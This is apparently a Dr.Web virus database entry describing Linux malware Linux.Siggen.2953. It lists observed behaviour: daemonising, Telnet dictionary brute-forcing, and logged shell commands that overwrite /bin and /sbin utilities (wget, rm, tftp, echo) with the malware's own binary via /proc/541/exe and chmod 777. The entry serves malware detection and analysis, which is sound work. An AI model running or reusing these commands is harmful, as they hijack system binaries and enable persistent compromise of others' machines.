Linux.Siggen.2953

Linux.Siggen.2953

Added to the Dr.Web virus database: 2020-05-16

Virus description added: 2020-05-16

Malicious functions:

Launches itself as a daemon

Substitutes application name for:

Replaces the following system files:

Launches processes:

sh -c mkdir app && >app/lib && cd app/lib; mv <SAMPLE_FULL_PATH> app/lib; chmod 777 app/lib
mkdir app
mv <SAMPLE_FULL_PATH> app/lib
chmod 777 app/lib
sh -c cd /bin/; cat tftp > tftp-cpy; cat /proc/541/exe > tftp ; chmod 777 tftp
cat tftp
cat /proc/541/exe
chmod 777 tftp
sh -c cd /bin/; cat rm > rm-cpy; cat /proc/541/exe > rm ; chmod 777 rm
cat rm
chmod 777 rm
sh -c cd /bin/; cat cd > cd-cpy; cat /proc/541/exe > cd ; chmod 777 cd
cat cd
chmod 777 cd
sh -c cd /bin/; cat wget > wget-cpy; cat /proc/541/exe > wget ; chmod 777 wget
cat wget
chmod 777 wget
sh -c cd /bin/; cat echo > echo-cpy; cat /proc/541/exe > echo ; chmod 777 echo
cat echo
chmod 777 echo
sh -c cd /sbin/; cat tftp > tftp-cpy; cat /proc/541/exe > tftp ; chmod 777 tftp
sh -c cd /sbin/; cat rm > rm-cpy; cat /proc/541/exe > rm ; chmod 777 rm
sh -c cd /sbin/; cat cd > cd-cpy; cat /proc/541/exe > cd ; chmod 777 cd
sh -c cd /sbin/; cat wget > wget-cpy; cat /proc/541/exe > wget ; chmod 777 wget
sh -c cd /sbin/; cat echo > echo-cpy; cat /proc/541/exe > echo ; chmod 777 echo

Kills system processes:

Performs operations with the file system:

Modifies file access rights:

Creates folders:

Creates or modifies files:

Network activity:

Awaits incoming connections on ports:

Establishes connection:

Attacks using a special dictionary (brute-force technique) via the Telnet protocol.

DNS ASK:

Sends data to the following servers: